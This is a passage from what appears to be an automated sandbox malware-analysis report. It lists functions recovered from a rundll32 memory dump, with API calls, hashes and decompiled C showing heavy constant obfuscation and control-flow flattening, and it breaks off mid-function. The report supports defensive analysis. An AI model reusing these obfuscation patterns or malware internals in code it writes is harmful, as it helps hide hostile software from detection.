                                                                                                                                    • Instruction ID: 3ed2c22f3edb5d6eff843fb87519111f775cc90d43d939277e2d6e4f79f93e6f
                                                                                                                                    • Opcode Fuzzy Hash: d6cd6d329ba87e568ec073a7283cc6e18d4dc02f583365c4ca35d155ad674d39
                                                                                                                                    • Instruction Fuzzy Hash: AA0244725183809FC3A4CF65D589A5BBBE1FFC4308F208A0DF59A86260C7B0C959CF42
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 10021854 Relevance: 12.1, APIs: 8, Instructions: 129filestringCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • __EH_prolog3.LIBCMT ref: 10021873
                                                                                                                                    • GetFullPathNameA.KERNEL32(?,00000104,?,?,00000014), ref: 100218B4
                                                                                                                                      • Part of subcall function 100201F1: __CxxThrowException@8.LIBCMT ref: 10020205
                                                                                                                                    • PathIsUNCA.SHLWAPI(?), ref: 100218FE
                                                                                                                                    • GetVolumeInformationA.KERNEL32 ref: 1002191C
                                                                                                                                    • CharUpperA.USER32 ref: 10021943
                                                                                                                                    • FindFirstFileA.KERNEL32(?,00000000), ref: 10021954
                                                                                                                                    • FindClose.KERNEL32(00000000), ref: 10021960
                                                                                                                                    • lstrlenA.KERNEL32(?), ref: 10021975
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000009.00000002.464918523.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                    • Associated: 00000009.00000002.464912255.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.464976774.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.464991878.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.465001079.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.465009024.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: FindPath$CharCloseException@8FileFirstFullH_prolog3InformationNameThrowUpperVolumelstrlen
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 3249967234-0
                                                                                                                                    • Opcode ID: eb490681b6d568b073a389bcc3f25b73e071b185c17e64a21006f2b4c6435a32
                                                                                                                                    • Instruction ID: 60a4613adf5c573b6f7ecf717c69f11d5bc108e5d701f0798ce0fed1b7752ca1
                                                                                                                                    • Opcode Fuzzy Hash: eb490681b6d568b073a389bcc3f25b73e071b185c17e64a21006f2b4c6435a32
                                                                                                                                    • Instruction Fuzzy Hash: 0E41DF7990024AAFEB11DFB4DC95AFF77BCEF14355F800529F815E2192EB30A944CA61
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 002C5E60 Relevance: 11.6, Strings: 9, Instructions: 323COMMONCrypto
                                                                                                                                    Download Yara Rule
                                                                                                                                    C-Code - Quality: 96%
                                                                                                                                    			E002C5E60(intOrPtr* __ecx, void* __edx, intOrPtr _a4, intOrPtr* _a8) {
				intOrPtr _v8;
				intOrPtr _v12;
				char _v16;
				intOrPtr _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				signed int _v120;
				signed int _v124;
				signed int _v128;
				signed int _v132;
				signed int _v136;
				signed int _v140;
				signed int _v144;
				signed int _v148;
				void* _t339;
				intOrPtr _t372;
				void* _t374;
				intOrPtr _t381;
				intOrPtr _t382;
				void* _t384;
				intOrPtr* _t385;
				void* _t387;
				intOrPtr _t421;
				intOrPtr* _t423;
				signed int _t424;
				signed int _t425;
				signed int _t426;
				signed int _t427;
				signed int _t428;
				signed int _t429;
				signed int _t430;
				signed int _t431;
				signed int _t432;
				signed int _t433;
				signed int _t434;
				signed int* _t437;

				_t385 = _a8;
				_push(_t385);
				_push(_a4);
				_t423 = __ecx;
				_push(__edx);
				_push(__ecx);
				E002D20B9(_t339);
				_v12 = 0xbcdf6a;
				_t437 =  &(( &_v148)[4]);
				_t421 = 0;
				_v8 = 0;
				_t387 = 0xc04f77e;
				_v92 = 0x11f6ef;
				_v92 = _v92 + 0xffffb184;
				_t424 = 0x71;
				_v92 = _v92 / _t424;
				_t425 = 0x24;
				_v92 = _v92 / _t425;
				_v92 = _v92 ^ 0x0000011d;
				_v56 = 0xfaa796;
				_v56 = _v56 >> 0xc;
				_v56 = _v56 << 0xa;
				_v56 = _v56 ^ 0x003ea801;
				_v36 = 0x1650e4;
				_v36 = _v36 + 0xce7;
				_v36 = _v36 ^ 0x00165dcb;
				_v116 = 0x54bb44;
				_v116 = _v116 + 0xffff1cdd;
				_v116 = _v116 + 0xffffa99d;
				_v116 = _v116 + 0xa8e5;
				_v116 = _v116 ^ 0x00542aa3;
				_v148 = 0xce1ee6;
				_v148 = _v148 ^ 0xff8bbe67;
				_v148 = _v148 | 0x521cb43f;
				_v148 = _v148 << 1;
				_v148 = _v148 ^ 0xfebb697e;
				_v52 = 0xc2bf1c;
				_v52 = _v52 << 0xc;
				_t426 = 0x73;
				_v52 = _v52 / _t426;
				_v52 = _v52 ^ 0x0061d2eb;
				_v88 = 0x8d6fba;
				_v88 = _v88 * 0x6a;
				_v88 = _v88 * 0x21;
				_v88 = _v88 >> 0xb;
				_v88 = _v88 ^ 0x00119314;
				_v48 = 0xec8dbc;
				_v48 = _v48 + 0xffff0a61;
				_v48 = _v48 | 0x0a9d8147;
				_v48 = _v48 ^ 0x0affcc17;
				_v24 = 0xd16d2c;
				_v24 = _v24 >> 2;
				_v24 = _v24 ^ 0x003dd5e6;
				_v124 = 0xaffa28;
				_v124 = _v124 >> 9;
				_v124 = _v124 * 9;
				_v124 = _v124 ^ 0x3775f33c;
				_v124 = _v124 ^ 0x377a4e54;
				_v76 = 0x9eb952;
				_v76 = _v76 >> 0xd;
				_v76 = _v76 << 0xa;
				_v76 = _v76 ^ 0x00160abd;
				_v108 = 0x8bec79;
				_t427 = 0x28;
				_v108 = _v108 * 0x30;
				_v108 = _v108 + 0xffff86d5;
				_v108 = _v108 + 0xffff5405;
				_v108 = _v108 ^ 0x1a3a719b;
				_v132 = 0x74267e;
				_v132 = _v132 + 0x1b76;
				_v132 = _v132 << 4;
				_v132 = _v132 + 0xffff1414;
				_v132 = _v132 ^ 0x074c11a2;
				_v100 = 0x4236e1;
				_v100 = _v100 ^ 0x96e608d5;
				_v100 = _v100 / _t427;
				_t428 = 0x2d;
				_v100 = _v100 * 0x6c;
				_v100 = _v100 ^ 0x96bd808a;
				_v84 = 0xb83730;
				_v84 = _v84 + 0xffffd15d;
				_v84 = _v84 >> 0xb;
				_v84 = _v84 ^ 0x0009ec33;
				_v140 = 0x532b06;
				_v140 = _v140 ^ 0xb0124270;
				_v140 = _v140 << 1;
				_v140 = _v140 / _t428;
				_v140 = _v140 ^ 0x02279f8d;
				_v44 = 0x33dfa;
				_v44 = _v44 + 0x1c37;
				_v44 = _v44 ^ 0x000817ba;
				_v136 = 0x1bf887;
				_v136 = _v136 ^ 0x189cf430;
				_v136 = _v136 + 0xffff0896;
				_v136 = _v136 ^ 0xf213b32f;
				_v136 = _v136 ^ 0xea9313b1;
				_v144 = 0xffa314;
				_v144 = _v144 >> 7;
				_v144 = _v144 ^ 0x35f9e2de;
				_t429 = 0x1f;
				_v144 = _v144 * 0x5b;
				_v144 = _v144 ^ 0x2f3e99d8;
				_v68 = 0x41f910;
				_v68 = _v68 / _t429;
				_v68 = _v68 ^ 0x28681de5;
				_v68 = _v68 ^ 0x2865ac71;
				_v96 = 0x6e33;
				_v96 = _v96 << 4;
				_v96 = _v96 ^ 0xe7b8475a;
				_v96 = _v96 << 1;
				_v96 = _v96 ^ 0xcf7b3a2b;
				_v104 = 0xedfca3;
				_t430 = 0x5e;
				_v104 = _v104 * 0x5f;
				_v104 = _v104 | 0x0b07679d;
				_v104 = _v104 ^ 0xc050dc4c;
				_v104 = _v104 ^ 0x9b058770;
				_v112 = 0xe25509;
				_v112 = _v112 ^ 0xf6d0fdca;
				_v112 = _v112 / _t430;
				_v112 = _v112 ^ 0x02984cdf;
				_v40 = 0xf7137d;
				_v40 = _v40 << 8;
				_v40 = _v40 ^ 0xf71f8dee;
				_v64 = 0x5508e8;
				_v64 = _v64 << 4;
				_v64 = _v64 | 0x94c676b5;
				_v64 = _v64 ^ 0x95dffb87;
				_v120 = 0xc732ae;
				_t431 = 0x75;
				_v120 = _v120 / _t431;
				_v120 = _v120 << 7;
				_t432 = 0x2c;
				_v120 = _v120 / _t432;
				_v120 = _v120 ^ 0x000601dd;
				_v72 = 0x179b9;
				_v72 = _v72 >> 1;
				_v72 = _v72 << 0xb;
				_v72 = _v72 ^ 0x05ec7a60;
				_v28 = 0x46261b;
				_t433 = 0x35;
				_v28 = _v28 / _t433;
				_v28 = _v28 ^ 0x000e773f;
				_v128 = 0xfd046c;
				_v128 = _v128 << 1;
				_v128 = _v128 << 3;
				_v128 = _v128 + 0xffff42a9;
				_v128 = _v128 ^ 0x0fc89804;
				_v60 = 0xb39cb2;
				_v60 = _v60 + 0xffffa360;
				_v60 = _v60 ^ 0x6e5a7866;
				_v60 = _v60 ^ 0x6eef17c9;
				_v32 = 0xb015d5;
				_t434 = 0x33;
				_v32 = _v32 / _t434;
				_v32 = _v32 ^ 0x00082471;
				_v80 = 0x87b3ae;
				_v80 = _v80 + 0xffffe530;
				_v80 = _v80 << 2;
				_v80 = _v80 ^ 0x021b575c;
				while(_t387 != 0x5e373ec) {
					if(_t387 == 0x87b20b3) {
						_t372 =  *0x2e3dfc; // 0x0
						_t374 = E002CCA90(_v96, _v56, _v104, _v112,  *((intOrPtr*)(_t423 + 4)), _v40, _t387, _v16, _t387,  &_v16, _v64, _v120, _v20, _v72, _v28, _v128, _v60, _v52,  *_t423,  *((intOrPtr*)(_t372 + 0x64)));
						_t437 =  &(_t437[0x12]);
						if(_t374 == _v88) {
							 *_t385 = _v20;
							_t421 = 1;
							 *((intOrPtr*)(_t385 + 4)) = _v16;
						} else {
							_t387 = 0x5e373ec;
							continue;
						}
					} else {
						if(_t387 == 0xc04f77e) {
							_t387 = 0xd382560;
							continue;
						} else {
							if(_t387 == 0xc68a5f7) {
								_push(_t387);
								_push(_t387);
								_t381 = E002C7FF2(_v16);
								_v20 = _t381;
								if(_t381 != 0) {
									_t387 = 0x87b20b3;
									continue;
								}
							} else {
								if(_t387 != 0xd382560) {
									L14:
									if(_t387 != 0x4d23f0b) {
										continue;
									} else {
									}
								} else {
									_t382 =  *0x2e3dfc; // 0x0
									_t384 = E002CCA90(_v48, _v92, _v24, _v124,  *((intOrPtr*)(_t423 + 4)), _v76, _t387, _v36, _t387,  &_v16, _v108, _v132, _t421, _v100, _v84, _v140, _v44, _v116,  *_t423,  *((intOrPtr*)(_t382 + 0x64)));
									_t437 =  &(_t437[0x12]);
									if(_t384 == _v148) {
										_t387 = 0xc68a5f7;
										continue;
									}
								}
							}
						}
					}
					return _t421;
				}
				E002D8519(_v32, _v80, _v20);
				_t387 = 0x4d23f0b;
				goto L14;
			}





























































                                                                                                                                    0x002c5e67
                                                                                                                                    0x002c5e71
                                                                                                                                    0x002c5e72
                                                                                                                                    0x002c5e79
                                                                                                                                    0x002c5e7b
                                                                                                                                    0x002c5e7c
                                                                                                                                    0x002c5e7d
                                                                                                                                    0x002c5e82
                                                                                                                                    0x002c5e8d
                                                                                                                                    0x002c5e90
                                                                                                                                    0x002c5e94
                                                                                                                                    0x002c5e9b
                                                                                                                                    0x002c5ea0
                                                                                                                                    0x002c5ea8
                                                                                                                                    0x002c5eb6
                                                                                                                                    0x002c5ebb
                                                                                                                                    0x002c5ec5
                                                                                                                                    0x002c5eca
                                                                                                                                    0x002c5ed0
                                                                                                                                    0x002c5ed8
                                                                                                                                    0x002c5ee0
                                                                                                                                    0x002c5ee5
                                                                                                                                    0x002c5eea
                                                                                                                                    0x002c5ef2
                                                                                                                                    0x002c5efd
                                                                                                                                    0x002c5f08
                                                                                                                                    0x002c5f13
                                                                                                                                    0x002c5f1b
                                                                                                                                    0x002c5f23
                                                                                                                                    0x002c5f2b
                                                                                                                                    0x002c5f33
                                                                                                                                    0x002c5f3b
                                                                                                                                    0x002c5f43
                                                                                                                                    0x002c5f4b
                                                                                                                                    0x002c5f53
                                                                                                                                    0x002c5f57
                                                                                                                                    0x002c5f5f
                                                                                                                                    0x002c5f67
                                                                                                                                    0x002c5f70
                                                                                                                                    0x002c5f73
                                                                                                                                    0x002c5f77
                                                                                                                                    0x002c5f7f
                                                                                                                                    0x002c5f8c
                                                                                                                                    0x002c5f95
                                                                                                                                    0x002c5f99
                                                                                                                                    0x002c5f9e
                                                                                                                                    0x002c5fa6
                                                                                                                                    0x002c5fae
                                                                                                                                    0x002c5fb6
                                                                                                                                    0x002c5fbe
                                                                                                                                    0x002c5fc6
                                                                                                                                    0x002c5fd1
                                                                                                                                    0x002c5fd9
                                                                                                                                    0x002c5fe4
                                                                                                                                    0x002c5fec
                                                                                                                                    0x002c5ff6
                                                                                                                                    0x002c5ffa
                                                                                                                                    0x002c6002
                                                                                                                                    0x002c600a
                                                                                                                                    0x002c6012
                                                                                                                                    0x002c6017
                                                                                                                                    0x002c601c
                                                                                                                                    0x002c6024
                                                                                                                                    0x002c6035
                                                                                                                                    0x002c6038
                                                                                                                                    0x002c603c
                                                                                                                                    0x002c6044
                                                                                                                                    0x002c604c
                                                                                                                                    0x002c6054
                                                                                                                                    0x002c605c
                                                                                                                                    0x002c6064
                                                                                                                                    0x002c6069
                                                                                                                                    0x002c6071
                                                                                                                                    0x002c6079
                                                                                                                                    0x002c6081
                                                                                                                                    0x002c6091
                                                                                                                                    0x002c609a
                                                                                                                                    0x002c609d
                                                                                                                                    0x002c60a1
                                                                                                                                    0x002c60a9
                                                                                                                                    0x002c60b1
                                                                                                                                    0x002c60b9
                                                                                                                                    0x002c60be
                                                                                                                                    0x002c60c6
                                                                                                                                    0x002c60ce
                                                                                                                                    0x002c60d6
                                                                                                                                    0x002c60e2
                                                                                                                                    0x002c60e6
                                                                                                                                    0x002c60ee
                                                                                                                                    0x002c60f6
                                                                                                                                    0x002c60fe
                                                                                                                                    0x002c6106
                                                                                                                                    0x002c610e
                                                                                                                                    0x002c6116
                                                                                                                                    0x002c611e
                                                                                                                                    0x002c6126
                                                                                                                                    0x002c612e
                                                                                                                                    0x002c6136
                                                                                                                                    0x002c613b
                                                                                                                                    0x002c6148
                                                                                                                                    0x002c614b
                                                                                                                                    0x002c614f
                                                                                                                                    0x002c6157
                                                                                                                                    0x002c6167
                                                                                                                                    0x002c616b
                                                                                                                                    0x002c6173
                                                                                                                                    0x002c617b
                                                                                                                                    0x002c6183
                                                                                                                                    0x002c6188
                                                                                                                                    0x002c6190
                                                                                                                                    0x002c6194
                                                                                                                                    0x002c619c
                                                                                                                                    0x002c61a9
                                                                                                                                    0x002c61aa
                                                                                                                                    0x002c61ae
                                                                                                                                    0x002c61b6
                                                                                                                                    0x002c61be
                                                                                                                                    0x002c61c6
                                                                                                                                    0x002c61ce
                                                                                                                                    0x002c61dc
                                                                                                                                    0x002c61e8
                                                                                                                                    0x002c61f0
                                                                                                                                    0x002c61fa
                                                                                                                                    0x002c61ff
                                                                                                                                    0x002c6207
                                                                                                                                    0x002c620f
                                                                                                                                    0x002c6214
                                                                                                                                    0x002c621c
                                                                                                                                    0x002c6224
                                                                                                                                    0x002c6232
                                                                                                                                    0x002c6237
                                                                                                                                    0x002c623d
                                                                                                                                    0x002c6246
                                                                                                                                    0x002c624b
                                                                                                                                    0x002c6251
                                                                                                                                    0x002c6259
                                                                                                                                    0x002c6261
                                                                                                                                    0x002c6265
                                                                                                                                    0x002c626a
                                                                                                                                    0x002c6272
                                                                                                                                    0x002c6284
                                                                                                                                    0x002c6289
                                                                                                                                    0x002c6292
                                                                                                                                    0x002c629d
                                                                                                                                    0x002c62a5
                                                                                                                                    0x002c62a9
                                                                                                                                    0x002c62ae
                                                                                                                                    0x002c62b6
                                                                                                                                    0x002c62be
                                                                                                                                    0x002c62c6
                                                                                                                                    0x002c62ce
                                                                                                                                    0x002c62d6
                                                                                                                                    0x002c62de
                                                                                                                                    0x002c62f0
                                                                                                                                    0x002c62f8
                                                                                                                                    0x002c62ff
                                                                                                                                    0x002c630a
                                                                                                                                    0x002c6312
                                                                                                                                    0x002c631a
                                                                                                                                    0x002c631f
                                                                                                                                    0x002c6327
                                                                                                                                    0x002c6335
                                                                                                                                    0x002c6418
                                                                                                                                    0x002c647f
                                                                                                                                    0x002c6484
                                                                                                                                    0x002c648b
                                                                                                                                    0x002c64c8
                                                                                                                                    0x002c64ca
                                                                                                                                    0x002c64d2
                                                                                                                                    0x002c648d
                                                                                                                                    0x002c648d
                                                                                                                                    0x00000000
                                                                                                                                    0x002c648d
                                                                                                                                    0x002c633b
                                                                                                                                    0x002c6341
                                                                                                                                    0x002c640e
                                                                                                                                    0x00000000
                                                                                                                                    0x002c6347
                                                                                                                                    0x002c634d
                                                                                                                                    0x002c63ec
                                                                                                                                    0x002c63ed
                                                                                                                                    0x002c63ee
                                                                                                                                    0x002c63f3
                                                                                                                                    0x002c63fe
                                                                                                                                    0x002c6404
                                                                                                                                    0x00000000
                                                                                                                                    0x002c6404
                                                                                                                                    0x002c6353
                                                                                                                                    0x002c6359
                                                                                                                                    0x002c64b1
                                                                                                                                    0x002c64b7
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x002c64bd
                                                                                                                                    0x002c635f
                                                                                                                                    0x002c635f
                                                                                                                                    0x002c63bd
                                                                                                                                    0x002c63c2
                                                                                                                                    0x002c63c9
                                                                                                                                    0x002c63cf
                                                                                                                                    0x00000000
                                                                                                                                    0x002c63cf
                                                                                                                                    0x002c63c9
                                                                                                                                    0x002c6359
                                                                                                                                    0x002c634d
                                                                                                                                    0x002c6341
                                                                                                                                    0x002c64e1
                                                                                                                                    0x002c64e1
                                                                                                                                    0x002c64a6
                                                                                                                                    0x002c64ac
                                                                                                                                    0x00000000

                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000009.00000002.464808022.00000000002C1000.00000020.00000800.00020000.00000000.sdmp, Offset: 002C0000, based on PE: true
                                                                                                                                    • Associated: 00000009.00000002.464801297.00000000002C0000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.464824952.00000000002E3000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_9_2_2c0000_rundll32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID: U$3n$3$TNz7$`%8$`%8$fxZn$~&t$6B
                                                                                                                                    • API String ID: 0-1604698900
                                                                                                                                    • Opcode ID: 8757477f9be89197f703d328a2709dcf8fa9dbd1fa099bf4d46b4b62c8b98d11
                                                                                                                                    • Instruction ID: 8d7abfe1b734f12e1b4082e250fd8410202b409c52840e1256acf32cb2bc54a1
                                                                                                                                    • Opcode Fuzzy Hash: 8757477f9be89197f703d328a2709dcf8fa9dbd1fa099bf4d46b4b62c8b98d11
                                                                                                                                    • Instruction Fuzzy Hash: D9F100714087819FD368CF66D589A5BBBF1FBC4B48F10891DF29A86260D7B28859CF03
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 100453C8 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 24registryclipboardCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000009.00000002.464918523.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                    • Associated: 00000009.00000002.464912255.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.464976774.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.464991878.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.465001079.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.465009024.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Version$ClipboardFormatRegister
                                                                                                                                    • String ID: MSWHEEL_ROLLMSG
                                                                                                                                    • API String ID: 2888461884-2485103130
                                                                                                                                    • Opcode ID: 0b261e62a9b93fa42ba21c75ed12931f30ea3bbfc1f984ccee5831c20ba1f621
                                                                                                                                    • Instruction ID: 7f315ad506f9c9b1e51aced78a2c78e4f88a242cc2e5f9aa46fc8e210ad3a912
                                                                                                                                    • Opcode Fuzzy Hash: 0b261e62a9b93fa42ba21c75ed12931f30ea3bbfc1f984ccee5831c20ba1f621
                                                                                                                                    • Instruction Fuzzy Hash: 94E0483680016396F3019764AD447A43AD4D7896D7F324037DE00C2551DA6609C3866D
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 002DCB5B Relevance: 10.3, Strings: 8, Instructions: 335COMMONCrypto
                                                                                                                                    Download Yara Rule
                                                                                                                                    C-Code - Quality: 79%
                                                                                                                                    			E002DCB5B(void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				char _v520;
				char _v1040;
				char _v1560;
				intOrPtr _v1564;
				intOrPtr _v1568;
				intOrPtr _v1572;
				signed int _v1576;
				signed int _v1580;
				signed int _v1584;
				signed int _v1588;
				signed int _v1592;
				signed int _v1596;
				signed int _v1600;
				signed int _v1604;
				signed int _v1608;
				signed int _v1612;
				signed int _v1616;
				signed int _v1620;
				signed int _v1624;
				signed int _v1628;
				signed int _v1632;
				signed int _v1636;
				signed int _v1640;
				signed int _v1644;
				signed int _v1648;
				signed int _v1652;
				signed int _v1656;
				signed int _v1660;
				signed int _v1664;
				signed int _v1668;
				signed int _v1672;
				signed int _v1676;
				signed int _v1680;
				signed int _v1684;
				signed int _v1688;
				signed int _v1692;
				signed int _v1696;
				signed int _v1700;
				signed int _v1704;
				signed int _v1708;
				void* _t341;
				void* _t370;
				void* _t379;
				intOrPtr _t382;
				intOrPtr _t385;
				void* _t396;
				intOrPtr _t399;
				intOrPtr _t436;
				signed int _t437;
				signed int _t438;
				signed int _t439;
				signed int _t440;
				signed int _t441;
				signed int _t442;
				signed int _t443;
				signed int _t444;
				signed int* _t449;

				_push(_a12);
				_t436 = 0;
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(0);
				E002D20B9(_t341);
				_v1572 = 0xe82680;
				_t449 =  &(( &_v1708)[5]);
				_v1568 = 0;
				_v1564 = 0;
				_t396 = 0x9368da1;
				_v1584 = 0x42403b;
				_v1584 = _v1584 + 0xffffd771;
				_v1584 = _v1584 ^ 0x00421785;
				_v1692 = 0xc00255;
				_t437 = 0x16;
				_v1692 = _v1692 / _t437;
				_v1692 = _v1692 + 0xffff6b87;
				_v1692 = _v1692 + 0xffff176e;
				_v1692 = _v1692 ^ 0x0004c90f;
				_v1668 = 0x5abcaa;
				_v1668 = _v1668 | 0xa6adf3e3;
				_v1668 = _v1668 + 0xffff713c;
				_v1668 = _v1668 << 6;
				_v1668 = _v1668 ^ 0xbfd49dc8;
				_v1700 = 0xb35187;
				_v1700 = _v1700 | 0x50a44dff;
				_v1700 = _v1700 + 0xfffff2e6;
				_v1700 = _v1700 >> 8;
				_v1700 = _v1700 ^ 0x0051b9c1;
				_v1644 = 0x4d7cc3;
				_v1644 = _v1644 + 0xffffa786;
				_v1644 = _v1644 | 0x8b8a715e;
				_v1644 = _v1644 ^ 0x6234f021;
				_v1644 = _v1644 ^ 0xe9f998a6;
				_v1624 = 0x204c5b;
				_v1624 = _v1624 + 0xffffa901;
				_v1624 = _v1624 + 0x49e1;
				_v1624 = _v1624 ^ 0x002fe6aa;
				_v1632 = 0xbb0a9b;
				_v1632 = _v1632 * 0x52;
				_v1632 = _v1632 | 0x83893080;
				_v1632 = _v1632 ^ 0xbbe905c0;
				_v1620 = 0x19fb1a;
				_v1620 = _v1620 | 0x985eae3d;
				_v1620 = _v1620 + 0xf613;
				_v1620 = _v1620 ^ 0x9864c971;
				_v1656 = 0x35ecb4;
				_v1656 = _v1656 * 0x29;
				_v1656 = _v1656 + 0x1081;
				_v1656 = _v1656 + 0xffffd324;
				_v1656 = _v1656 ^ 0x08a8fe56;
				_v1580 = 0xc60f6f;
				_v1580 = _v1580 + 0xffffd3e6;
				_v1580 = _v1580 ^ 0x00c233ea;
				_v1664 = 0x2df5c;
				_v1664 = _v1664 << 8;
				_v1664 = _v1664 * 0x4c;
				_v1664 = _v1664 + 0xffffaed7;
				_v1664 = _v1664 ^ 0xda40187b;
				_v1672 = 0x38409b;
				_v1672 = _v1672 * 0x33;
				_v1672 = _v1672 | 0x7fcdffbb;
				_v1672 = _v1672 ^ 0x7ff87770;
				_v1680 = 0xe751cb;
				_v1680 = _v1680 ^ 0x8590ed7d;
				_v1680 = _v1680 + 0xffffebc9;
				_v1680 = _v1680 * 0x5e;
				_v1680 = _v1680 ^ 0x01e2719c;
				_v1688 = 0x15e1cd;
				_v1688 = _v1688 + 0xfe19;
				_v1688 = _v1688 + 0xffffc88c;
				_v1688 = _v1688 << 7;
				_v1688 = _v1688 ^ 0x0b5f3deb;
				_v1696 = 0x33a377;
				_v1696 = _v1696 << 0xa;
				_v1696 = _v1696 ^ 0xfb2d04b5;
				_v1696 = _v1696 | 0xd2f07883;
				_v1696 = _v1696 ^ 0xf7fa7ce3;
				_v1640 = 0x94004d;
				_v1640 = _v1640 >> 0xa;
				_t438 = 0x67;
				_v1640 = _v1640 * 0x3d;
				_v1640 = _v1640 >> 7;
				_v1640 = _v1640 ^ 0x00039ca1;
				_v1648 = 0xfcfef3;
				_v1648 = _v1648 * 0x18;
				_v1648 = _v1648 + 0x9c71;
				_v1648 = _v1648 | 0xf5d6202a;
				_v1648 = _v1648 ^ 0xf7f57601;
				_v1596 = 0xc58f80;
				_v1596 = _v1596 + 0xffff2f17;
				_v1596 = _v1596 ^ 0x00ce700d;
				_v1684 = 0xee980b;
				_v1684 = _v1684 >> 6;
				_v1684 = _v1684 / _t438;
				_v1684 = _v1684 + 0xffff2a3f;
				_v1684 = _v1684 ^ 0xfff3655c;
				_v1652 = 0x45a4a9;
				_v1652 = _v1652 >> 0xe;
				_t439 = 0x6e;
				_v1652 = _v1652 * 0x51;
				_v1652 = _v1652 + 0x9be3;
				_v1652 = _v1652 ^ 0x0004d4d8;
				_v1708 = 0x222243;
				_t176 =  &_v1708; // 0x222243
				_v1708 =  *_t176 / _t439;
				_v1708 = _v1708 << 9;
				_v1708 = _v1708 + 0xffff4a12;
				_v1708 = _v1708 ^ 0x009b5339;
				_v1612 = 0x464ea3;
				_v1612 = _v1612 + 0x89cc;
				_v1612 = _v1612 >> 2;
				_v1612 = _v1612 ^ 0x00167067;
				_v1588 = 0xd74d9e;
				_v1588 = _v1588 | 0x529da741;
				_v1588 = _v1588 ^ 0x52d09c78;
				_v1628 = 0x60b5eb;
				_v1628 = _v1628 >> 9;
				_t440 = 0x19;
				_v1628 = _v1628 / _t440;
				_v1628 = _v1628 ^ 0x000ff1bc;
				_v1676 = 0xfb7b01;
				_v1676 = _v1676 << 4;
				_v1676 = _v1676 + 0xffffc28e;
				_t441 = 0x1b;
				_v1676 = _v1676 / _t441;
				_v1676 = _v1676 ^ 0x0096cb21;
				_v1660 = 0xed67c1;
				_v1660 = _v1660 << 0xa;
				_v1660 = _v1660 | 0xef7d69c8;
				_v1660 = _v1660 << 2;
				_v1660 = _v1660 ^ 0xfff42fe1;
				_v1604 = 0x46c7e8;
				_v1604 = _v1604 << 0xf;
				_v1604 = _v1604 ^ 0x63fe3710;
				_v1636 = 0x7a345b;
				_v1636 = _v1636 + 0xd479;
				_v1636 = _v1636 + 0x8c7f;
				_v1636 = _v1636 ^ 0x00708a00;
				_v1704 = 0x80508e;
				_v1704 = _v1704 ^ 0xf958081f;
				_t442 = 0x4b;
				_v1704 = _v1704 / _t442;
				_t443 = 0x34;
				_v1704 = _v1704 * 0x44;
				_v1704 = _v1704 ^ 0xe2885afb;
				_v1576 = 0x325f4f;
				_t259 =  &_v1576; // 0x325f4f
				_v1576 =  *_t259 * 0x7a;
				_v1576 = _v1576 ^ 0x180920ed;
				_v1592 = 0xd554f9;
				_v1592 = _v1592 * 0x4e;
				_v1592 = _v1592 ^ 0x40f8e8dd;
				_v1608 = 0x6be570;
				_v1608 = _v1608 + 0x3d4f;
				_v1608 = _v1608 ^ 0x4461575c;
				_v1608 = _v1608 ^ 0x440eeedf;
				_v1616 = 0x4acfbf;
				_v1616 = _v1616 / _t443;
